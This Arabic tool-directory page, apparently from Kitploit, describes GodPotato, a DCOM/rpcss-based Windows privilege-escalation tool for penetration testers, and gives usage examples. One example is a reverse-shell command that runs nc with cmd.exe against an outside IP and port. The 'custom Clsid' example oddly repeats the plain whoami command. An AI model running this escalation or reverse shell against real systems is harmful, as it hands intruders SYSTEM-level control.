Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
GodPotato — أداة تصعيد الامتيازات تعتمد على DCOM لأنظمة Windows Server 2012-2022 وWindows 8-11، ترفع المستخدمين الذين لديهم ImpersonatePrivilege إلى NT AUTHORITY\SYSTEM من خلال ثغرة rpcss oxid. | Kitploit
أدوات/GitHubGitHub/beichendream/godpotato
تصعيد الامتيازاتالاستغلالما بعد الاستغلالاختبار الاختراق
GitHubbeichendream/godpotato

GodPotato

أداة تصعيد الامتيازات تعتمد على DCOM لأنظمة Windows Server 2012-2022 وWindows 8-11، ترفع المستخدمين الذين لديهم ImpersonatePrivilege إلى NT AUTHORITY\SYSTEM من خلال ثغرة rpcss oxid.

عرض المستودع
2.3k273منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

جود بوتيتو (GodPotato)

بناءً على تاريخ تصعيد الصلاحيات عبر بوتيتو (Potato) على مدى 6 سنوات، من بداية RottenPotato إلى نهاية JuicyPotatoNG، اكتشفت تقنية جديدة من خلال البحث في DCOM، مما يتيح تصعيد الصلاحيات في ويندوز 2012 - ويندوز 2022، الآن طالما لديك صلاحية "ImpersonatePrivilege". عندها تصبح "NT AUTHORITY\SYSTEM"، عادةً ما تمتلك خدمات الويب وقواعد البيانات صلاحية "ImpersonatePrivilege".

يُستخدم تصعيد الصلاحيات عبر بوتيتو عادةً عند حصولنا على صلاحيات الويب/قواعد البيانات. يمكننا رفع صلاحية مستخدم خدمة منخفض الصلاحيات إلى صلاحية "NT AUTHORITY\SYSTEM". لكن الإصدارات السابقة من بوتيتو لا تعمل على أحدث أنظمة ويندوز. عندما كنت أبحث في DCOM، وجدت طريقة جديدة يمكنها تنفيذ تصعيد الصلاحيات. توجد بعض العيوب في rpcss عند التعامل مع oxid، و rpcss هي خدمة يجب أن يفتحها النظام، لذا يمكنها العمل على أي نظام ويندوز تقريبًا، وقد أطلقت عليها اسم GodPotato

الإصدارات المتأثرة

Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11

مثال

root@kitploit:~

    FFFFF                   FFF  FFFFFFF
   FFFFFFF                  FFF  FFFFFFFF
  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
 FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF
 FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF
 FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF
  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF
  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF
   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF
    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF


الوسائط:

        -cmd مطلوب:نص سطر الأوامر (الافتراضي cmd /c whoami)

مثال:

GodPotato -cmd "cmd /c whoami"


استخدام Clsid المدمج في البرنامج لتصعيد الصلاحيات وتنفيذ أمر بسيط

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

تخصيص Clsid وتنفيذ الأوامر

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

تنفيذ أوامر الشل العكسي

root@kitploit:~
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

شكر

zcgonvh

skay

الترخيص

رخصة Apache 2.0

تنزيل الأداة